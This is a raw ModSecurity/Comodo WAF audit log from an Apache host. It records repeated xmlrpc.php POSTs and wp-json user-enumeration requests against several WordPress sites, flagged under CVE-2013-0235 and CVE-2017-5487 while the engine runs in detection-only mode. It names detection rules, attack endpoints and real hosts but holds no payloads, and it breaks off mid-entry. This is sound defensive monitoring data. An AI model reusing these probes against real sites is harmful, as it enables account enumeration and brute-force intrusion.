--72cda91b-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --72cda91b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --72cda91b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE73IpK-05zbifgH_rQGYQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750005538792945 927580 (- - -) Stopwatch2: 1750005538792945 927580; combined=2139, p1=384, p2=1306, p3=51, p4=66, p5=202, sr=99, sw=130, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --72cda91b-Z-- --78f39305-A-- [15/Jun/2025:22:09:25.989008 +0530] aE73Pb59833JshVCMq_aTwAAAAY 34.168.66.196 34494 127.0.0.1 7081 --78f39305-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.rsda.in X-Real-IP: 34.168.66.196 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --78f39305-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 X-Robots-Tag: noindex Link: <https://www.rsda.in/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --78f39305-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.rsda.in"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE73Pb59833JshVCMq_aTwAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750005565690270 298827 (- - -) Stopwatch2: 1750005565690270 298827; combined=1727, p1=326, p2=1305, p3=0, p4=0, p5=95, sr=87, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --78f39305-Z-- --63db9207-A-- [15/Jun/2025:22:09:28.207066 +0530] aE73P7ELSBhs7IymaYROkQAAAAM 34.168.66.196 34616 127.0.0.1 7081 --63db9207-B-- POST //xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 34.168.66.196 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 486 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --63db9207-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --63db9207-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.168.66.196 (+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.168.66.196 (+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE73P7ELSBhs7IymaYROkQAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750005567926839 280281 (- - -) Stopwatch2: 1750005567926839 280281; combined=2273, p1=360, p2=1582, p3=44, p4=54, p5=147, sr=95, sw=86, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --63db9207-Z-- --ab13a22e-A-- [15/Jun/2025:22:09:59.656267 +0530] aE73XvVluSm0zKldlXcyzwAAAAA 128.199.112.101 44876 127.0.0.1 7081 --ab13a22e-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 499 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --ab13a22e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --ab13a22e-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE73XvVluSm0zKldlXcyzwAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750005598681109 975226 (- - -) Stopwatch2: 1750005598681109 975226; combined=2054, p1=351, p2=1304, p3=42, p4=62, p5=184, sr=103, sw=111, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ab13a22e-Z-- --7fd04017-A-- [15/Jun/2025:22:10:59.382116 +0530] aE73mkmAj8yxyFrMChhuSgAAAAE 128.199.112.101 55440 127.0.0.1 7081 --7fd04017-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 520 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --7fd04017-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --7fd04017-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE73mkmAj8yxyFrMChhuSgAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750005658462697 919476 (- - -) Stopwatch2: 1750005658462697 919476; combined=2090, p1=368, p2=1329, p3=47, p4=65, p5=175, sr=108, sw=106, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7fd04017-Z-- --1820d851-A-- [15/Jun/2025:22:12:00.066148 +0530] aE73184euW2k9bZXhFmmJAAAAAo 128.199.112.101 49196 127.0.0.1 7081 --1820d851-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 496 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --1820d851-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --1820d851-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE73184euW2k9bZXhFmmJAAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750005719134552 931670 (- - -) Stopwatch2: 1750005719134552 931670; combined=2415, p1=398, p2=1578, p3=50, p4=73, p5=195, sr=114, sw=121, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1820d851-Z-- --abc8326e-A-- [15/Jun/2025:22:13:01.004973 +0530] aE74FDtuDRGAAnNiXIefhAAAAAg 128.199.112.101 48768 127.0.0.1 7081 --abc8326e-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --abc8326e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --abc8326e-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE74FDtuDRGAAnNiXIefhAAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750005780069714 935315 (- - -) Stopwatch2: 1750005780069714 935315; combined=2369, p1=404, p2=1549, p3=47, p4=69, p5=182, sr=137, sw=118, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --abc8326e-Z-- --4a6c3765-A-- [15/Jun/2025:22:14:01.863520 +0530] aE74UL59833JshVCMq_a0AAAAAY 128.199.112.101 55784 127.0.0.1 7081 --4a6c3765-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --4a6c3765-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --4a6c3765-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE74UL59833JshVCMq_a0AAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750005840794674 1068925 (- - -) Stopwatch2: 1750005840794674 1068925; combined=2393, p1=354, p2=1588, p3=47, p4=69, p5=204, sr=95, sw=131, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4a6c3765-Z-- --bb17052b-A-- [15/Jun/2025:22:15:01.712272 +0530] aE74jDNzfFBMRkII6hmqnwAAAAI 128.199.112.101 36780 127.0.0.1 7081 --bb17052b-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 493 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --bb17052b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --bb17052b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE74jDNzfFBMRkII6hmqnwAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750005900718589 993748 (- - -) Stopwatch2: 1750005900718589 993748; combined=2271, p1=364, p2=1521, p3=37, p4=55, p5=187, sr=101, sw=107, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bb17052b-Z-- --6578717f-A-- [15/Jun/2025:22:16:01.152973 +0530] aE74yDtuDRGAAnNiXIef3wAAAAg 128.199.112.101 43786 127.0.0.1 7081 --6578717f-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 500 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --6578717f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --6578717f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE74yDtuDRGAAnNiXIef3wAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750005960219460 933569 (- - -) Stopwatch2: 1750005960219460 933569; combined=2485, p1=396, p2=1576, p3=43, p4=63, p5=235, sr=114, sw=172, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6578717f-Z-- --92e0856f-A-- [15/Jun/2025:22:17:01.918993 +0530] aE75BDNzfFBMRkII6hmq0AAAAAI 128.199.112.101 56662 127.0.0.1 7081 --92e0856f-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --92e0856f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --92e0856f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE75BDNzfFBMRkII6hmq0AAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750006020887102 1031949 (- - -) Stopwatch2: 1750006020887102 1031949; combined=2226, p1=374, p2=1481, p3=46, p4=57, p5=168, sr=112, sw=100, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --92e0856f-Z-- --78a35767-A-- [15/Jun/2025:22:17:17.512622 +0530] aE75FfVluSm0zKldlXczowAAAAA 124.109.12.110 32850 127.0.0.1 7081 --78a35767-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 124.109.12.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Language: en-FM,en-US;q=0.8,en;q=0.6,es-ES;q=0.4,es;q=0.2 User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) --78a35767-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://archangledesignstudio.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin,User-Agent Connection: close Content-Type: application/json; charset=UTF-8 --78a35767-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "archangledesignstudio.com"] [uri "/wp-json/wp/v2/users"] [unique_id "aE75FfVluSm0zKldlXczowAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750006037256460 256264 (- - -) Stopwatch2: 1750006037256460 256264; combined=1972, p1=337, p2=1517, p3=0, p4=0, p5=117, sr=96, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --78a35767-Z-- --bb98f47c-A-- [15/Jun/2025:22:18:01.479574 +0530] aE75QDtuDRGAAnNiXIegJwAAAAg 128.199.112.101 52604 127.0.0.1 7081 --bb98f47c-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 498 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --bb98f47c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --bb98f47c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE75QDtuDRGAAnNiXIegJwAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750006080514010 965651 (- - -) Stopwatch2: 1750006080514010 965651; combined=2245, p1=366, p2=1364, p3=55, p4=80, p5=238, sr=108, sw=142, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bb98f47c-Z-- --b2a9a402-A-- [15/Jun/2025:22:19:01.826041 +0530] aE75fPVluSm0zKldlXcz9wAAAAA 128.199.112.101 59918 127.0.0.1 7081 --b2a9a402-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 498 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --b2a9a402-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --b2a9a402-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id 